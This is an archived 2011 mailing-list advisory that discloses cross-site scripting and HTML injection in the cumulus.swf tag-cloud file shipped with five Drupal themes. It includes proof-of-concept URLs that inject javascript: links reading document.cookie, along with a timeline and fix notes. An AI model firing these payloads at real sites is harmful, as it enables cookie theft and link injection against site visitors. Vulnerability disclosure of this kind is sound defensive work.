Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27122
HistoryOct 04, 2011 - 12:00 a.m.

Vulnerability in multiple themes for Drupal

2011-10-0400:00:00
vulners.com
8

Hello list!

The endless saga continue. After informing about a lot of vulnerable plugins
and widgets with this swf-file, here is information about multiple
vulnerable themes ;-).

I want to warn you about Cross-Site Scripting vulnerability in multiple
themes for Drupal. And a lot of other themes for Drupal and other engines
can be vulnerable.

This XSS is similar to XSS vulnerability in WP-Cumulus, which I've disclosed
in 2009 (http://securityvulns.com/Wdocument842.html). Because these themes
use cumulus.swf (it's the same tagcloud.swf made by author of WP-Cumulus).
About such vulnerabilities I wrote in 2009-2011, particularly about millions
of flash files tagcloud.swf which are vulnerable to XSS attacks I mentioned
in my article XSS vulnerabilities in 34 millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).


Affected products:

Vulnerable are all versions of themes Admire Grunge, Morok, Pushbutton,
Danland and Analytic for Drupal.


Details:

XSS (WASC-08):

http://site/themes/admire_grunge/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/morok/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/pushbutton/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/sites/all/themes/danland/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/themes/analytic/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS. Also it's possible
to conduct (like in WP-Cumulus) HTML Injection attack.

HTML Injection (WASC-12):

http://site/path/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E


Fixed version of swf-file:

All users of these and other themes, plugins and widgets (and their
developers) with this swf-file could fix this issue but updating swf-file to
fixed version.

But as I wrote in my last advisory
(http://lists.grok.org.uk/pipermail/full-disclosure/2011-September/082656.html),
the developer of WP-Cumulus fixed only XSS vector, but not HTML Injection
vector. So it's still possible to conduct HTML Injection attacks (for
injecting arbitrary links) on all versions of this swf-file (including
version with fixed XSS hole). Which should be taken into account.


Timeline:

2009.11.09 - disclosed at my site about WP-Cumulus.
2009.11.11 - informed developer of WP-Cumulus.
2009.11.15 - developer of WP-Cumulus fixed XSS (but not HTML Injection).
2011.10.01 - disclosed at my site about five vulnerable themes for Drupal.
And a lot of other themes for Drupal and other engines can be vulnerable.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5407/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua